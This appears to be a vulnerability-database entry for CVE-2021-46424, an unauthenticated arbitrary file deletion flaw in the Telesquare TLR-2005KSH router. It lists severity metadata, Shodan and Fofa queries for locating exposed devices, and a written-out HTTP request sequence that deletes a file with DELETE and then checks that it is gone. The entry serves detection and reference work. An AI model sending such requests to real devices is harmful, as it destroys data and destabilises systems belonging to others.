🔙 목록으로 돌아가기

CVE-2021-46424: Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete

TitleTelesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete
Authorgy741
SeverityCritical
ImpactSuccessful exploitation could lead to loss of critical data or system instability.
RemediationApply the latest patch or update provided by the vendor to fix the vulnerability.
CVSS Score9.1
EPSS Score0.91469
CVE IDCVE-2021-46424
CWE IDCWE-306
Shodan Queryhttp.html:"TLR-2005KSH"http.html:"tlr-2005ksh"
Fofa Querybody="tlr-2005ksh"
Tags cve2021 cve telesquare intrusive packetstorm vuln

🔍 Vulnerability Description

Telesquare TLR-2005KSH 1.0.0 is affected by an arbitrary file deletion vulnerability that allows a remote attacker to delete any file, even system internal files, via a DELETE request.

🌐 HTTP Request

GET /images/icons_title.gif HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
DELETE /images/icons_title.gif HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip
GET /images/icons_title.gif HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:140.0) Gecko/20100101 Firefox/140.0
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-46424.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-46424.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A